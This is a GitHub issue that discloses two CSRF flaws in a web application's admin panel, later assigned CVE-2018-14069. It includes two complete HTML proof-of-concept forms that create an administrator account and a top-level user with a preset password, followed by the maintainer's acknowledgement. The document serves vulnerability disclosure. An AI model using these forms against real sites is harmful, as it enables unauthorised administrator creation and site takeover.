Skip to content
This repository has been archived by the owner on Apr 14, 2021. It is now read-only.

There is two CSRF vulnerability that can add the administrator account #20

Closed
FiveAourThe opened this issue Jul 13, 2018 · 2 comments
Closed
Assignees
Labels

Comments

@FiveAourThe
Copy link

After the administrator logged in, open the following two page
poc:
add_admin.html

<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=manager&a=add" method="post">
	<div class="form-group">
		<label>用户名</label>
		<input class="form-control" type="text" name="username" value="csrf">
	</div>
	<div class="form-group">
		<label>邮箱</label>
		<input class="form-control" type="text" name="email" value="csrf@test.com">
	</div>
	<div class="form-group">
		<label>密码</label>
		<input class="form-control" type="password" name="password" value="123456">
	</div>
	<div class="form-group">
		<label>确认密码</label>
		<input class="form-control" type="password" name="repassword" value="123456">
	</div>
	<div class="form-group">
		<button class="btn btn-success" type="submit" >添加</button>
	</div>


</form>
</html>

add_user.html

<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=member&a=add" method="post">
	<div class="form-group">
		<label>用户名</label>
		<input class="form-control" type="text" name="username" value="test">
	</div>
	<div class="form-group">
		<label>邮箱</label>
		<input class="form-control" type="text" name="email" value="test@test.com">
	</div>
	<div class="form-group">
		<label>密码</label>
		<input class="form-control" type="password" name="password" value="123456">
	</div>
	<div class="form-group">
		<label>确认密码</label>
		<input class="form-control" type="password" name="repassword" value="123456">
	</div>
	<div class="form-group">
        <label>用户等级</label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" value="1" >路人
        </label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" value="2" >实习白帽子
        </label>
		<label class="radio-inline">
          <input type="radio" name="type" id="type" value="3" >普通白帽子
        </label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" checked="checked" value="4" >核心白帽子
        </label>
    </div>
	<div class="form-group">
        <label>用户状态</label>
        <label class="radio-inline">
          <input type="radio" name="status" id="status" value="0">禁止登陆
        </label>
        <label class="radio-inline">
          <input type="radio" name="status" id="status" value="1"  checked="checked">正常
        </label>
    </div>
	<div class="form-group">
		<button class="btn btn-success" type="submit" >添加</button>
	</div>


</form>
</html>
@martinzhou2015
Copy link
Owner

Hi,

Sorry for late. Thanks for you constructive suggestion.

I've noticed the flaw existed in the place where you pointed out. The flaw will be fixed in the next version.

Again, your feedback is highly appreciated. Please let us know if you have more questions.

@NicoleG25
Copy link

@martinzhou2015 Could you please point out the commit where this was addressed?
Note that CVE-2018-14069 was assigned.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
Projects
None yet
Development

No branches or pull requests

3 participants